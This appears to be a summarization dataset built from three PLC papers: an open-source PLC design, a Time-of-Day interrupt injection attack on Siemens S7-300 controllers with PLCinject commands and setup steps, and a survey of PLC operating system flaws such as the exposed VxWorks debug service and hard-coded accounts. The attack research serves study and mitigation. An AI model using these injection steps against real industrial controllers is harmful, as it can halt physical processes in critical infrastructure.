OpenPLC CPU, containing both the ladder logic and the functions of the OpenPLC firmware. Fig. 6. OpenPLC Ladder Editor software running on a PC A. MODBUS Communication MODBUS is an industry standard protocol for automation devices. Although, the message format is maintained, there are some variations of this protocol depending on the physical interface it will be used on. A s the OpenPLC has Ethernet over TCP-IP, it was implemented support for the MODBUS-TCP protocol. Only the most used functions of the protocol were implemented, as shown next: Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:57 UTC from IEEE Xplore. Restrictions apply. FC01 - Read Coil Status FC02 - Read Input Status FC03 - Read Holding Registers FC05 - Force Single Coil FC15 - Force Multiple Coils B. Boards Communication To become a modular system, each module of the O p e n P L C m u s t h a v e a w a y t o c o m m u n i c a t e w i t h t h e C P U . The RS-485 bus is the physical protocol through which messages are sent. But it was necessary to create a protocol on the application layer, to standardize the messages sent and received. The protocol created was called OPLC Protocol. It is a simple protocol that encapsu lates each message sent or received with information about destination, size of the message and function to be executed. TABLE I. OPLC PROTOCOL HEADER Start Size Function Address Data 1 Byte 1 Byte 1 Byte 1 Byte n Bytes Every message starts with a s t a r t b y t e , w h i c h i s a l w a y s 0x7E. The receiver will only process the message after receiving the start byte. The si ze field must contain the size (in bytes) of the Data field only. The function field is relate d to the data field. It means that what the receiver will do with the data received depends on the function. Five functions were implemented for the OPLC Protocol: 0x01 Ask for the card type 0x02 Change card logical address 0x03 Read discrete inputs 0x04 Set discrete outputs 0x05 error message The address field may have the logic or the physical address of the card, according to the function requested. For example, the functions 0x01 and 0x02 are addressed to the physical address, because they are related to low level commands, such as get card information or change the logical address. V. R ESULTS To evaluate the OpenPLC as a real PLC, a benchmark had to be made comparing it with another controller. This was achieved using a model of a five floor building with an elevator originally controlled by a Siemens S7-200 PLC. Modifications were made to the model enabling it to interchange PLCs easily for the tests. The elevator is moved b y a D C m o t o r a t t a c h e d t o i t . T h e r e a r e l i m i t s w i t c h e s o n every floor to indicate elevator's position. Also, limit switch es were installed at the top and bottom of the building to prevent the elevator to move over the permitted range. Lights indicators on every floor were used to visually indicate when the elevator stops at the respective floor. Five push buttons were used to call the elevator to the desired floor. The ladder diagram for this task was already written for the Siemens PLC using the Siemens Step 7 platform. It used 13 digital inputs and 10 digital outputs to fully control the model. The diagram was printed and the exactly same diagram was written for the OpenPLC using the same logic blocks, see Figure 10. The OpenPLC Ladder Editor was used to compile, simulate and upload the diagram to the OpenPLC. During tests, a bug on the ladder diagram was found. If the user held the push button related to the floor on which the elevator was located while pushing another button to send it to another floor, the system hung with an infinite loop. As expected, the OpenPLC behaved exactly the same way as the Siemens PLC, presenting the same bug. After correcting the ladder on both controllers, each one operated flawlessly. The response of diverse stimulus on each PLC was identical on every tested situation. VI. C ONCLUSION The open source community is growing stronger every day. There are many projects, from software to hardware with contributions from people all around the world. Creating an open source industrial controller from scratch is a very bold task. But thanks to the support of the open source community like the Arduino and LDmicro it was possible to create a prototype of a functional PLC comparable with a standardized industry controller. During tests, the OpenPLC behaved exactly the same way as other controllers, given the same input impulses. The MODBUS-TCP communication was tested using SCADA software from different vendors. It was possible to read inputs and outputs and force outputs as it would be on any other PLC. Our next big step is to use our OpenPLC in a field application, evaluating its robustness, versatility and ease of use for the user. R EFERENCES [1] P.E. Moody and R.E. Morley, How Manufacturing Will Work in the Year 2020 , Simon and Schuster. [2] R. Oshana and M. Kraeling, Software Engineering for Embedded Systems: Methods, Practical Techniques, and Applications , 1st ed. Newnes, 2013 pp.12-20. [3] K.H. John and M. Tiegelkamp, IEC 61131-3: Programming Industrial Automation Systems, 2nd ed. Springer, 2010 pp.147-168. [4] Atmel Corporation, ATmega2560, Atmel.com. 2014. 8 Jul. 2014. http://www.atmel.com/devices/atmega2560.aspx. [5] Arduino, Arduino MEGA ADK, arduino.cc. 2014. 8 Jul. 2014. http://arduino.cc/en/Main/ArduinoBoardMegaADK. [6] J . W e s t h u e s , L a d d e r L o g i c f o r P I C a n d A V R , c q . c x . 2014. 8 Jul. 2014. http://cq.cx/ladder.pl. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:57 UTC from IEEE Xplore. Restrictions apply.
Summary:
Companies are always looking for ways to increase production. The elevated consumerism pushes factories to produce more in less time. Industry automation came as the solution to increase quality, production and decrease costs. Since the early 70s, PLC (Pro grammable Logic Controller) has dominated industrial automation by replacing the relay logic circuits. However, due to its high costs, there are many places in the world where automation is still inaccessible. This paper describes the crea tion of a low-cost open source PLC, comparable to those already used in industry automation, with a modular and simplified architecture and expansion capabilities. Our goal with this project is to create the first fully functional standardized open source PLC. We believe that, with enough help from the open source community, it will become a low cost solution to speed up development and industrial production in less developed countries.
|
Summarize:
Index Terms Programmable Logic Controllers, Injection At- tack; Time-Of-Day Interrupt; Patching Attack; I. I NTRODUCTION Programmable logic controllers (PLCs) in industrial control systems (ICSs) are in a direct connection with physical pro- cesses e.g. production lines, electrical power grids and other critical plants. They are equipped with control logic that de- nes how to monitor and control these critical processes. Thus, their safety, durability, and predictable response times are the primary design concerns. PLCs are offered by several vendors such as Siemens, Allen-Bradley, Mitsubishi, Schneider and Modicon. Each has its own proprietary rmware, programming language, communication protocols and maintenance software. An interesting fact is that the basic hardware and software architecture for all PLCs is similar, meaning that all PLCs contain variables, and logic to control their inputs and outputs. The PLC code is written on an engineering station in the vendor s control logic language and then compiled into an executable format e.g. MC7 for Siemens CPUs before being downloaded to the PLC. Siemens S7 PLCs in the Simaticfamily [1] are estimated to have over 30% in the worldwide PLC market [2]. Furthermore, the Simatic line of products includes the Totally Integrated Automation Portal (TIA) software, which functions as the engineering station. The TIA Portal and S7 PLCs are communicated over the S7 network protocol. Unfortunately, most of industrial controllers are not designed to be resilient against cyber-attacks. This means if a PLC is compromised, then the entire physical process controlled by the effected PLC is also compromised which eventually could lead to a disastrous incident. A traditional control logic attack involves modifying or replacing the original program code, running on the target PLC by downloading malicious codes or blocks to the target device. According to the best of our knowledge all the previous injection attacks were done online and strictly require the adversary to be connected to the target PLC until the attack is run. In contrast to this, our new approach is the rst work that does not need any access to the target system at the point zero for the attack, and attackers can activate their attacks at a certain time of ine without being connected to the network. For running our experiments, we developed an already published attacking tool called PLCinject [17]. We structured our approach of exploiting S7 PLCs into two phases: 1) Patching the control logic program of a PLC with an in- terrupt block, precisely Time-of-Day (TOD) block named Organization Block 10 (we call it OB10 for the rest of this paper) in Simatic software . This is done online. 2) Activating the patch injected at a certain date and time without any need of being connected to the target PLC at that time. This is done of ine. The rest of the paper is organized as follows. Section II discusses related work. In section III we give an overview of the PLC s structure and its operation system, while our experimental setup is presented in section IV . Our attack approach is illustrated in section V , and we evaluate the potential resulting disturbance due to our patch in section VI. In section VII we discuss our results and introduce possible mitigation solutions against our attack, and nally conclude this paper with our future works. II. R ELATED WORK The main vulnerability involved in a typical injection attack is the lack of authentication measures in the PLC protocols.978-1-7281-6207-2/21/$31.00 2021 IEEE1442021 4th IEEE International Conference on Industrial Cyber-Physical Systems (ICPS) | 978-1-7281-6207-2/21/$31.00 2021 IEEE | DOI: 10.1109/ICPS49255.2021.9468226 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:22 UTC from IEEE Xplore. Restrictions apply. Recent examples of such attacks on ICS occurred in the Ukraine [3], [4]. These attacks caused controlling electrical distribution and wide-spread blackouts. In 2014, the German federal of ce for information security announced a cyber- attack at an unnamed steel mill, where hackers manipulated and disrupted control systems to such a degree that a blast furnace could not be properly shot down, resulting in massive damage [5]. At black Hat USA 2015 Klick et al. [6] demon- strated injection of malware into the control logic of a Simatic S7-300 PLC, without any service disrupting. In a follow on work, Spenneberg et al [7] presented a PLC worm. The worm spreads internally from one PLC to other target PLCs. During the infection phase the worm scans the network for new targets (PLCs). A Ladder Logic Bomb malware written in ladder logic or one of the compatible languages was introduced in [8]. Such malware is inserted by an attacker into existing control logic on PLCs. Anyway, this scenario requires from an attacker to be familiar with the programming languages that the PLC is pro- grammed with. A recent work presented a reverse engineering- attack called ICSREF [9], which can automatically generate malicious payloads against the target system, and does not require any prior knowledge of the ICS. [10] demonstrated common-mode failure attacks targeting an industrial system that consists of redundant modules for recovery purpose. These modules are commonly used in nuclear power plant settings. The authors used DLL hijacking to intercept and modify the command-37 packets sent between the engineering station and the PLC, and could cause all the modules to fail. [11] presented a remote attack on the control logic of a PLC. They were able to infect the PLC and to hide the infection from the engineering software at the control center. They implemented their attack on a Schneider Electric Modicon M221, and its vendor-supplied engineering software (SoMachine-Basic). An- other work demonstrated a series of attacks targeting Siemens S7-1200 PLCs [12]. Their investigation involves attacks like session stealing, phantom PLC, cross connecting controllers and denial of S7 connections. In 2019, researchers in [13] showed that an attacker is able to transfer control logic to the data blocks of a PLC then changing the PLC s system control ow to execute the attacker s logic. III. P ROGRAMMABLE LOGIC CONTROLLER (PLC) PLCs are industrial embedded devices that are programmed to monitor and control factory applications. They were origi- nally designed for automation control and considered as hard real-time devices. PLC programs stored on the integrated memory or on an external Multi Media Card (MMC) de nes how the inputs and outputs are controlled. For communication or special purpose applications the functionality of a CPU can be extended with external modules. In the following we give an overview of the PLC execution environment, operating system, user program, cycle time, and Time-of-Day interrupt. A. PLC Execution Environment Siemens PLCs run a real time operating system (OS), which cycles executing the user program through four steps as shownin gure 1. The CPU rst checks the status of all inputs i.e. it takes an image of the inputs (e.g. sensors, switches, etc.) and saves it in the I/O memory. Please note that we mean by taking an image that the CPU saves a binary value representing the inputs in a speci c place in the memory. Afterwards, the logic control program is executed in time slices with a duration of approximately 1 msec. Each time slice is divided into three parts, which are executed sequentially: the operating system, the user program and the communication. The number of time slices signi cantly depends on the current user program. However, after the program execution has ended, the CPU updates all the output status i.e. updates the image of outputs saved in the I/O memory. Then, the CPU returns to the start of the cycle and restarts the cycle time monitoring [14]. B. PLC Operating System Siemens provides their Total Integrated Automation (TIA) Portal software to engineers for developing PLC programs. It consists of two main components. The STEP 7 as develop- ment environment for PLCs and WinCC to con gure Human Machine Interfaces (HMIs). Engineers are able to program PLCs in one of the following programming concepts Ladder Diagram (LAD), Function Block Diagrams (FBD), Structured Control Language (SCL) and Statement List (STL). C. User Program PLC programs are divided into the following units: Or- ganization Blocks (OBs), Functions (FCs), Function Blocks (FBs), Data Blocks (DBs), System Functions (SFCs), System Function Blocks (SFBs) and System Data Blocks (SDBs). OBs, FCs and FBs contain the actual code while DBs provide storage for data structures and SDBs for the current PLC con gurations. A simple PLC program consists of at least one organization block called OB1, which is comparable to the main () function in a traditional C program. In more complex programs, engineers can encapsulate code by using functions FCs and function blocks FBs. The only difference is an additional data block DB as a parameter for calling an FB. The SFCs and SFBs are built into the PLC, and the operating system calls the main block (OB1) cyclically to execute the user program. D. PLC Cycle Time The cycle time is the time required by the operating system to run the main program and all program sections that interrupt its cycle e.g. executing other blocks, and system activities e.g. updating the process image. An interesting fact is that the cycle time is not the same for every cycle, and highly depends on the complexity of the current user program, and the events interrupting the execution of the user program. Figure 2 presents the execution of a program interrupted by events in a PLC. In normal operation if an event occurs, the block currently being executed is interrupted at a command boundary and a different organization block that is assigned to the particular event is called. Once the new organization block has been executed, the cyclic program resumes at the point145 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:22 UTC from IEEE Xplore. Restrictions apply. Fig. 1: Simpli ed sequence of a PLC cycle Fig. 2: The execution process of a program interrupted in an S7-300 PLC at which it was interrupted. This hold true as the maximum allowed cycle time (150 msec by default) is not exceeded. In other words, if there are too many interrupt OBs called in the main OB1, the entire cycle time might be extended more than it is set in the PLC hardware con guration. Exceeding the maximum allowed execution cycle generates a software error, and the PLC calls a speci c block to handle this error i.e. OB80. There are two cases to handle with this error: 1) PLC turns to a stop mode if the OB80 is not loaded in the main program. 2) PLC executes the instructions that OB80 is programmedwith e.g. an alarm. STEP 7 provides the user with many possible interrupt blocks e.g. Time-of-Day interrupt (OB10 to OB17), Time- Delay interrupt (OB20 to OB23), Cyclic interrupt (OB30 to OB38), Hardware interrupt (OB40 to OB47), etc. In this work, we are only interested in the Time-of-Day (TOD for the rest of this paper) interrupt block OB10. E. Time-Of-Day Interrupt (OB10) Siemens CPUs allow the users to interrupt the main program (OB1) runs at different intervals. Meaning that the cyclic146 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:22 UTC from IEEE Xplore. Restrictions apply. execution process of the main program will be suspended at a speci ed time set by the user, the CPU jumps to execute all the instructions that the corresponding interrupt block is programmed with (here OB10), and after OB10 is being processed, the CPU resumes to execute the main program at the point where it was interrupted. This interrupt might occur once, every minute, hourly, daily, weekly, monthly, or at the end of the month depending on the needs of the interrupt. In order to start a TOD interrupt, in a normal operation, an operator rst needs to set and then to activate this interrupt. S7-300 PLCs support up to three possibilities to con gure a TOD interrupt: - Automatic start of the TOD interrupt. This can be achieved by setting and activating the TOD interrupt per con guration. - Setting the TOD interrupt per con guration and then ac- tivating it by calling the SFC30 (ACT_ TINT) instruction in the logic program. - Setting the TOD interrupt by calling SFC28 (SET_ TINT) instruction and then activating it by calling SFC30 ACT- TINT instruction. The rst two methods are not practical in our attack, as they both require the attacker to have access to the TIA Portal at the engineering station and to con gure the interrupt entirely/partly there. Therefore, we use the third method to set a TOD interrupt in our malicious code i.e. SFC28 and SFC30 as illustrated later in section V . IV. EXPERIMENTAL SET-UP In this section, we describe our experimental set-up, starting with the process to be controlled and presenting the equipment used afterwards. A. The physical process to be controlled In our experiments, we are using the following application example: there are two aquariums lled with water that is pumped from one to the other until a certain level is reached and then the pumping direction is inverted see gure 31. The two PLCs used in this application are connected to the engineering station (TIA Portal) via an Ethernet cable, and exchanging data over the network using S7 communication to control the water level in each aquarium. The control process in this set-up is cyclically running as follows: PLC.1 (S7 315-2DP) reads the input signals coming from the sensors 1, 2, 3 and 4. The two upper sensors (Num. 1, 3) installed on both aquariums are reporting to PLC.1 when the aquariums are full. While the two lower sensors (Num. 2, 4) are reporting to PLC.1 when the aquariums are empty. After that, PLC.1 sends the sensors readings to PLC.2 (S7 315- 2PN/DP) using an industrial Ethernet Communication Proces- sor (IE-CP 343-1 Lean). Then PLC.2 powers the pumps on/off depending on the sensors readings received from PLC.1. 1Please note that we are using this setup also in experiments run earlier, i.e. this description is by default very similar to the one in our earlier publications [20], [21], but we keep it here to ensure the paper is self contained.B. Hardware Equipment In our testbed we have the following components: ICS operator, attacker machine, PLCs, Communication processor, sensors and pumps which are described in detail in the following: -ICS Operator: it s a device that is connected to the PLC/CP using the TIA Portal software. Here, we use version 15.22and Windows 73as operating system. -Attacker Machine: it s a device that sneakily connects to the system without appropriate credentials. In our experiments, the attacker uses operating system LINUX Ubuntu 18.04.1 LTS4running on a Laptop5. -PLCs S7-300: as mentioned before, we use Siemens products in our experiments and, particularly CPUs from the 300 family. The PLCs used in this work are S7 315-2 PN/DP6 and S7 315- 2 DP7. -Four capacitive proximity Sensors: in our testbed, these are four sensors from Sick, Type CQ35-25NPP-KC18, with a sensing range of 25 mm and electrical wiring DC 4-wire. -Two Pumps: here, two DC-Runner 1.1 from Aqua Medic9 with transparent pump housing 0-10 v connection for external control, maximum pumping output 1200 I/h and maximum pumping height: 1.5m. C. Attacker Model and Attack Surface With regard to the type of attack we consider, We assume that the attacker has no prior knowledge about the actual process controlled by the PLCs, how the PLCs are connected, which communication protocols the PLCs use, or the logic program running on each. We also assume that the attacker has already access to the network and is capable to send packets to the PLCs. Please note that compromising the ICS network and scanning the industrial network in purpose to obtain the IP addresses of the connected devices are out of the scope of this work, and can be achieved via typical attack vectors in our IT world such as infected USB and vulnerable web server for network compromising, and then running NMAP, SNMP or another network scanners to get the target IP address. Our attack scenario is network based, and can be successfully launched by any attacker with network access to the target PLC. In this work, the attack surface is a combination of device design and software implementation; more precisely, it is the implementation of the network stack, PLC speci c protocol and PLC operating system. 2https://support.industry.siemens.com/cs/document/109752566/simatic- step-7-and-wincc-v15-trial-download-?dti=0&lc=en-US. 3https://www.microsoft.com/de-de/software-download/windows7. 4https://ubuntu.com/download/desktop. 5https://www.dell.com/support/home/de/de/debsdt1/productsupport/product /latitude-e6510/overview. 6https://support.industry.siemens.com/cs/pd/480032?pdti=td&dl=en&lc=en- WW. 7https://support.industry.siemens.com/cs/pd/155410?pdti=td&dl=en&lc=en- DE. 8https://www.sick.com/de/en/proximity-sensors/capacitive- proximitysensors/cq/cq35-25npp-kc1/p/p244267. 9https://www.aquariumspecialty.com/aqua-medic-dc-runner-1-2- pump.html.147 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:22 UTC from IEEE Xplore. Restrictions apply. Fig. 3: Example application of our control process V. A TTACK DESCRIPTION Like in a typical injection attack, we patch our malicious code (TOD interrupt) in the original logic code of the target PLC. The attacker s code is located at the very beginning of the main code (OB1) and the CPU checks whether the condition of the interrupt is met in each single execution cycle. Meaning that, the attacker s code will be always checked but only executed when the date and time of the CPU s clock matches the date and time set by the attacker. Here, we have two cases: - The date of the CPU s clock matches the attack date. The CPU immediately halts executing OB1, stores the breaking point s location in a dedicated register, and jumps to execute the corresponding interrupt block (in our example OB10). - The date of the CPU s clock does not match the attack date. The CPU resumes to execute OB1 after checking the interrupt condition without activating the interrupt. As mentioned earlier in section I, we developed a tool called PLCinject published in [6] to inject the target PLC with our malicious blocks. This tool is written in C language and pub- lically available for more information about its functionality [17]. In the following we illustrate the three main steps that we follow to perform exploiting the target PLC. A. Preparation Phase (Of ine) As mentioned earlier in section I, the MC7 bytecode is the native form of the PLC code. Meaning that before download- ing the malicious blocks to the target, it is required from theattacker to obtain all the blocks to be injected in compiled versions e.g. SFC28, SFC30, OB10, DB1. For achieving this, we open the TIA Portal and program a TOD interrupt, using only software call instructions i.e. using SFC28 and SFC30 blocks as follows: 1) Con guring SFC28 (SET_TINT): The SFC28 block is used to set the TOD interrupt and has ve parameters as shown in gure 4. The OB_ NR parameter is assigned to a certain organization block number to be called. As we aim to use a TOD interrupt, the number of OB we assign this parameter to is 10. The SDT parameter is set to the date and time of the interrupt i.e. the start time of the attack. For the purpose of exibility, we assign SDT to a date- variable stored in a data block e.g. DB1 .Data. Please note that the date-variable includes the year, month, day, hour, and minutes, while all seconds and milliseconds of the determined date are ignored and set to 0. Using the date-variable stored in the data block DB1 to assign this parameter allows us to change the date of the attack at any time by only modifying the DB1 .Date variable, and to avoid reprogramming the entire malicious codes all way again. Afterwards, we set how often we want the interrupt to occur from the start date (SDT) onwards. In our example, interrupting the OB1 once is suf cient as the interrupt block puts the CPU on stop mode as we show in the next subsection. The word W#16#0000 in the parameter PERIOD allows OB10 to be executed only one time when there is a match between the attack date (SDT) and the date of the CPU (CPU clock). The actual parameter of RET_ V AL contains an error code to report if an error occurs148 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:22 UTC from IEEE Xplore. Restrictions apply. while the function is active. We assign this parameter to an integer-variable stored in DB1 called error i.e. DB1 .error. Fig. 4: Con guration of SFC28 (SET_TINT) in SCL 2) Con guring SFC30 (ACT_TINT): Fig. 5: Con guration of SCF30 (ACT_TINT) in SCL After con guring SFC28 successfully, we need to activate the interrupt in the main program. this is done by adding SFC30 (ACT_ TINT) to OB1. Figure 5 shows the con gura- tion of this block. We replace the OB_ NR with the number of OB to be activated (OB10), while we set RET_ V AL parameter to the integer-variable in DB1 ( DB1 .error). 3) Con guring the TOD Organization block (OB10): The attacker s code to be executed at the time de ned in SDT is programmed in a separated organization block i.e. OB10. In this work, OB10 is aiming to put the CPU into stop mode. This is done by using command SFC46, also called in Simatic software as STP. The STP block changes the CPU to stop mode once it is executed. An interesting fact is that the STP block has no parameters and can be executed without any dependencies. This makes our attack very simple but also very effective and it might cause a signi cant harm in case a PLC unexpectedly is forced to turn into stop mode in critical infrastructures. However, our approach enables the attacker to program the OB10 with any additional/different malicious code causing different abnormal behaviour of the PLC e.g. resetting status word registers, modifying an input/output, etc. After con guring our malicious blocks, we downloaded each block from the TIA Portal to the PLC separately, and then uploaded each block on the attacker machine by using our python script based on Python-snap710library, precisely the function full_ upload (type, block number) . For our example, we managed successfully to retrieve all the blocks in their MC7 version by replacing the above-mentioned function s pa- rameters with the corresponding block name and number e.g. 10https://pypi.org/project/python-snap7/for OB10, we set the parameters on OB and 10 respectively, etc. B. Patching the Attacker Blocks (Online) After getting all required blocks in MC7 versions, we can patch any S7 PLC using our developed PLCinject tool executing the following command: Plcinject c ip [PLC s IP address] -r [rack=0] -s [slot=2] -p [blocks to be patched] -b [blocks to be called] -o [blocks to be added] f [path of the blocks] For a better understanding of using the tool, we give the following two commands that we run to get the target PLC patched successfully as shown in gure 6: 1- Downloading OB10 and DB1 to the PLC s program: Plcinject c 192.168.0.1 -r 0 -s 2 -o OB10 DB1 f /Home/User/Path 2- Injecting the OB1 with SFC28 and SFC30 blocks: Plcinject c 192.168.0.1 -r 0 -s 2 -p OB1 -b SFC28 SFC30 f /Home/User/Path In the rst command, we just used the parameter -o which is only downloading new blocks to the PLC s program located at the IP address 192.168.0.1, whereas in the second command we used the both -p and -b parameters which rst uploads OB1 from our target PLC, injects OB1 with call instructions to the already con gured interrupt blocks SFC28 and SFC30, and then pushes the injected OB1 back to the PLC. Please note that the attacker needs to execute the above commands in the same order i.e. he downloads rst OB10 and DB1 before he injects OB1 with the interrupt blocks. this is due to the fact that the parameters in both SFC28 and SFC30 are assigned to parameters de ned in the data block DB1 and OB10; and injecting the OB1 rst with the interrupt blocks before downloading DB1 and OB10 will cause a software error and the CPU will turn into software error mode. C. Attacking Phase (Of ine) After a successful injection, precisely with the next exe- cution cycle of the PLC, the patched OB1 will be executed i.e. the CPU checks the interrupt condition in each execution cycle. Our patch remains in idle mode as long as the interrupt condition is not yet met. Once the date of the attack matches the date of the CPU, the interrupt will be activated, and block OB10 will then be executed. In our example, this enables the attacker to force the CPU to turn into stop mode even if he is disconnected. Thus, if the attacker has the ability to push his malicious code into a target PLC once he compromised the security measures, he can keep the injection inside the PLC idle for hours, days, months or even years as the physical process is not disturbed before the attack date. Please note149 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:22 UTC from IEEE Xplore. Restrictions apply. (a) Original program (b) Patched program by the attacker Fig. 6: Scheme of patching the PLC s code that after patching the PLC and before meeting the point zero for the attack, the engineering station might only detect this injection if the ICS operator requires the program that the PLC runs and nds out the difference between the original code at the engineering station and the patched program running in the PLC. VI. E VALUATION To assess the potential resulting disturbance in executing the user s program (OB1) due to our patch, we measured the execution cycle time of OB1 for three different scenarios: 1. In normal operation i.e.before patching the PLC. 2. In idle attack i.e. after patching the PLC and before the interrupt is being activated. 3. Activated attack i.e. after the interrupt is being executed. An interesting fact is that Siemens PLCs, by default, store the time of the last execution cycle in a local variable of OB1 called OB1_PREV_CYCLE . Therefore, we added a small SCL code snippet to our control program which stores the last cycle time in a separate data block. We recorded 800 executioncycles for each scenario, calculated the arithmetic mean ( s) and median (-) values, and then presented all the measurements in boxplot as shown in gure 7. Our investigations showed that the calculated mean value of executing the patched OB1 is approximately 2 ms, and differs slightly from the mean value of executing the original OB1 which is almost 1.75 ms. Meaning that, checking the interrupt condition in each execution cycle throughout processing the patched OB1 does not disturb the physical process to be controlled. As we can also see in gure 7, there is no recorded execution cycles after the interrupt condition is met and the OB10 is being executed. This is due to the fact that the CPU turned into stop mode after processing the STP block that the OB10 is programmed with. Based on our analysis, we can conclude that the ICS operator might only be able to detect our patch if he requires the program that the infected PLC runs. Fig. 7: Boxplot presents the measured execution cycles of OB1 before the patch, after the Patch i.e. in idle mode, and after activating the TOD Block VII. D ISCUSSION AND FUTURE WORK In this paper, we presented a new attack approach for compromising S7 PLCs at a certain date and time without needing the attacker to be connected to the target device at that time. For a practical implementation, we performed the attack on a real hardware and software used in industrial settings, and could successfully turn the CPU into stop mode at a determined time even when the attacker machine was of ine. Our investigation showed that an attacker is that able to patch the PLC can and activate his patch at a later time on his will, as well as that the patch neither disturbs the execution process of the control logic, nor exceeds the maximum allowed execution cycle time. However, our attack has limitations. TIA Portal can monitor the execution time of the main program by a watchdog which is dedicated to kill the main program if the execution time becomes too long (over 150 msec by default). So an attacker should be aware of to150 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:22 UTC from IEEE Xplore. Restrictions apply. the fact that any additional malicious blocks that he wants to patch, together with the original program must not exceed the overall maximum execution time of 150 msec, otherwise the CPU reports an error (OB80), and reveals such attack at the very early stage. Siemens protects their PLCs with passwords, providing three different protection levels: non- protection, write protection, read-write protection. Thus, the password protected PLCs will immediately reject our patch once we attempt to push our malicious codes into the PLC. But in fact, an attacker still can bypass the authentication as reported in many previous events [18], [19], [21]. So, in case the PLC is password protected he needs rst to bypass the password before patching the target, while it does not matter after the patch whether there is any new security measures introduced, a new password set, the PLC is kept of ine, etc. From security point of view, we highly suggest some countermeasures to our attack such as protection and detecting of control logic. The rst step to protect our systems is to improve the isolation from other networks [15], combining this with standard security practices [16], and defence-in-depth security in the control systems. In addition, a digital signature should be employed not only to the rmware, as most of the PLC vendors do, but also to the control logic. Furthermore, a mechanism to check the protocol header which contains information about the type of the payload is also recommended as a solution to detect and block any potential unauthorized transfer of the control logic. The exploit of S7 PLCs presented in this paper is ef cient and we aim in the future to investigate our attack against much more modern S7 PLCs e.g. S7-1200 and S7-1500 CPUs. As Siemens claims that its new devices are more resilient against cyber-attacks and even secured by improved measures and integrity checks. Therefore, investigating the security of such devices will be more challenging and complex.
Summary:
Industrial control systems (ICSs) architecture con- sists of programmable logic controllers (PLCs) which commu- nicate with an engineering station on one side, and control a certain physical process on the other side. Siemens PLCs, particularly S7-300 controllers, are widely used in industrial systems, and modern critical infrastructures heavily rely on them. But unfortunately, Security features are largely absent in such devices or ignored/disabled because security is often at odds with operations. As a consequence of the already reported vulnerabilities, it is possible to leverage PLCs and perhaps even the corporate IT network. In this paper we show such PLCs are vulnerable and demonstrate that exploiting the execution process of the logic program running in a PLC is feasible. We target the logic program by injecting a Time-of-Day (TOD) interrupt code, which interrupts the execution sequence of the logic control at a certain time the attacker wishes. This attack is the rst work that allows external adversaries to patch their malicious codes once they access exposed PLCs, keeping their attack idle inside the infected device, and then activate the attack at later time without even being connected to the target at the attack date. In contrast to all previous works, this new approach opens the door entirely for attackers to compromise PLCs when they are of ine at the point zero for the attack. For a real scenario, we implemented our attack on a real small industrial setting using S7-300 PLCs, and developed an already published tool called PLCinject to run our experiments. We nally suggest some potential mitigation approaches to secure systems against such threat.
|
Summarize:
Keywords embedded software, information security, manufacturing automation, PLC I. INTRODUCTION NTRODUCED in the late 1960s, Programmable Logic Controllers (PLCs) were designed to eliminate the higher cost of complicated, relay-based control systems. By the 1980s, Distributed Control Systems (DCS) achieved popularity within increasingly automated plant environments, with keyboards and workstations replacing large, individual control cabinets. Entire production lines and processes could be linked over industrial cable/bus networks to provide monitoring and control to a foreman s desk. The available systems were in every sense proprietary, capturing market share by staying incompatible with competitive systems. In the early 80 s a strategy to decentralize proprietary process control systems emerged and spawned the Fieldbus wars. Thus began the unraveling of central control strategies with a vision towards driving more intelligence into each field device and utilizing non-proprietary technology. Today, almost every PLC, DCS, Remote Terminal Unit (RTU), or Safety Integrated System (SIS) controller on the market has a commercial operating system in it. For some examples, see Table 1. Microsoft Windows vulnerabilities are abound and reported in various resources on the Internet. Similar is with Linux and QNX. As for OS-9 and VxWorks, these operating systems are not famous like Windows or Linux, and consequently their bugs and vulnerabilities are less known. However, vulnerabilities are still there, and here are some examples. Microware OS-9 [1] is a multi-user, multi-tasking UNIX-like operating system. It has been shown to be Stevan A. Milinkovi , School of Computing, Knez Mihailova 6/VI, 11000 Belgrade, Serbia; (e-mail: smilinkovic@raf.edu.rs). Ljubomir R. Lazi , State University of Novi Pazar, Vuka Karad i a bb, 36300 Novi Pazar, Serbia; (e-mail: llazic@np. ac.rs). susceptible to attacks using ICMP redirects. An attacker could forge ICMP redirect packets and possibly alter the host routing tables and subvert security by causing traffic to flow on a path the network manager didn't intend. TABLE 1: OPERATING SYSTEMS OF SOME COMMERCIAL PLC S PLC Operating System Allen-Bradley PLC5 Microware OS-9 Allen-Bradley ControlLogix VxWorks Emerson DeltaV VxWorks Schneider Modicon Quantum VxWorks Yokogawa FA-M3 Linux Wago 750 Linux PLC reference platform QNX Neutrino Siemens SIMATIC WinAC RTX Microsoft Windows VxWorks (product of Wind River Systems, acquired by Intel in 2009) is more famous embedded real-time operat- ing system. It has been used to power everything from the Apple Airport Extreme access points and BMW iDrive to the Mars rovers and the C-130 Hercules aircraft. Unfortu-nately, it has two serious flaws, described in [2,3]. The first flaw refers to an exposed VxWorks debug ser- vice (WDB Agent). This service runs over UDP port 17185 and allows complete access to the device, including the ability to manipulate memory, steal data, and ultimately hijack the entire operating system. This service was inadvertently left exposed by over 100 different vendors and affects at least 250000 devices sitting on the internet today. The second flaw relates to a weak password hashing im- plementation in the VxWorks operating system. Any de- vice that uses the built-in authentication library to handle Telnet and FTP authentication can be compromised. The flaw occurs because there are only 210000 possible hash outputs for all possible passwords. An attacker can simply cycle through the most common ranges of hash outputs of about 8000 work-alike passwords to gain access to a VxWorks device. Using the FTP protocol, this attack would only take about 30 minutes to try all common password permutations. Schneider Modicon devices are the stories of their own. It can be easily seen directly from Schneider s firmware that there are a huge number of hard-coded accounts in the devices. These accounts let a user do anything to the device, i.e. they all have the same privileges. For example, you can upload a new firmware to the device and use the Ethernet module in a Modicon as a general-purpose computer. Even you can run Linux on it. Schneider left debugging symbols in the firmware, which are pretty easy to reverse engineer. Some of documented Schneider Modicon vulnerabilities are reported in [4,5]. Industrial PLC security issues Stevan A. Milinkovi , Member, IEEE and Ljubomir R. Lazi , Member, WSEAS I20th Telecommunications forum TELFOR 2012 Serbia, Bel grade, November 20-22, 2012. 